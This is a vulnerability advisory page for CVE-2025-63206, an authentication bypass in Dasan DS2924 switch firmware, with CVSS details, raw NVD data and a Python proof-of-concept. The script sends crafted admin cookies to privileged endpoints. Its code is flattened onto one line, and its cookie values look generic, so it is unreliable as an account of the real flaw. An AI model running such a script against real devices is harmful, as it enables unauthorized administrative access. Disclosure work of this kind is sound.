Security Vulnerability Report
中文
CVE-2025-63206 CVSS 9.8 CRITICAL

CVE-2025-63206

Published: 2025-11-19 18:15:49
Last Modified: 2025-12-31 14:09:23
Source: [email protected]

Description

An authentication bypass issue was discovered in Dasan Switch DS2924 web based interface, firmware versions 1.01.18 and 1.02.00, allowing attackers to gain escalated privileges via storing crafted cookies in the web browser.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:dasannetworks:ds2924_firmware:1.01.18:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:dasannetworks:ds2924_firmware:1.02.00:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:dasannetworks:ds2924:-:*:*:*:*:*:*:* - NOT VULNERABLE
Dasan Switch DS2924 固件 1.01.18
Dasan Switch DS2924 固件 1.02.00

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3 """ CVE-2025-63206 PoC - Dasan Switch DS2924 Authentication Bypass Note: This PoC is for educational and authorized security testing purposes only. """ import requests import sys from urllib.parse import urljoin def exploit_auth_bypass(target_url, target_cookie=None): """ Exploit authentication bypass in Dasan Switch DS2924 by injecting crafted cookies into the request. Args: target_url: Base URL of the Dasan Switch DS2924 web interface target_cookie: Optional existing cookie for context Returns: bool: True if exploitation successful, False otherwise """ # Craft malicious cookies to bypass authentication # These cookies simulate an authenticated admin session headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36', 'Content-Type': 'application/x-www-form-urlencoded', } # Construct malicious authentication cookies cookies = { 'SESSIONID': 'admin_session_exploit', 'AUTH_LEVEL': 'administrator', 'USERNAME': 'admin', 'PRIVILEGE': '15', } if target_cookie: cookies.update(target_cookie) # Attempt to access privileged endpoints with crafted cookies privileged_endpoints = [ '/cgi-bin/admin/system_info.cgi', '/cgi-bin/admin/user_config.cgi', '/cgi-bin/admin/network_config.cgi', '/admin/main.html', ] print(f"[*] Target: {target_url}") print(f"[*] Injecting crafted cookies to bypass authentication...") for endpoint in privileged_endpoints: full_url = urljoin(target_url, endpoint) try: response = requests.get(full_url, headers=headers, cookies=cookies, timeout=10, verify=False) # Check if we got privileged access (200 OK without redirect to login) if response.status_code == 200 and 'login' not in response.url.lower(): print(f"[+] SUCCESS: Gained access to {endpoint}") print(f"[+] Response length: {len(response.text)} bytes") return True else: print(f"[-] Failed to access {endpoint} (Status: {response.status_code})") except requests.RequestException as e: print(f"[-] Error accessing {endpoint}: {str(e)}") return False def main(): if len(sys.argv) < 2: print("Usage: python cve_2025_63206_poc.py <target_url>") print("Example: python cve_2025_63206_poc.py http://192.168.1.1/") sys.exit(1) target = sys.argv[1] if not target.startswith('http'): target = 'http://' + target if exploit_auth_bypass(target): print("\n[!] Vulnerability confirmed - Authentication bypass successful") print("[!] Immediate action required to patch this vulnerability") else: print("\n[-] Exploitation attempt completed") if __name__ == '__main__': main()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-63206", "sourceIdentifier": "[email protected]", "published": "2025-11-19T18:15:48.647", "lastModified": "2025-12-31T14:09:23.310", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An authentication bypass issue was discovered in Dasan Switch DS2924 web based interface, firmware versions 1.01.18 and 1.02.00, allowing attackers to gain escalated privileges via storing crafted cookies in the web browser."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-306"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:dasannetworks:ds2924_firmware:1.01.18:*:*:*:*:*:*:*", "matchCriteriaId": "44AC6B51-3934-430A-A9D5-95D9BD9874F0"}, {"vulnerable": true, "criteria": "cpe:2.3:o:dasannetworks:ds2924_firmware:1.02.00:*:*:*:*:*:*:*", "matchCriteriaId": "8A246406-213F-420A-BB54-82E51FF2B8B5"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:dasannetworks:ds2924:-:*:*:*:*:*:*:*", "matchCriteriaId": "2335BCDB-543B-4022-9143-40F80F7F4F68"}]}]}], "references": [{"url": "http://dasansmc.com/", "source": "[email protected]", "tags": ["Broken Link"]}, {"url": "https://github.com/shiky8/my--cve-vulnerability-research/tree/main/CVE-2025-63206_Dasan%20Switch%20DS2924%20Authentication%20Bypass", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://github.com/shiky8/my--cve-vulnerability-research/tree/main/CVE-2025-63206_Dasan%20Switch%20DS2924%20Authentication%20Bypass", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Third Party Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.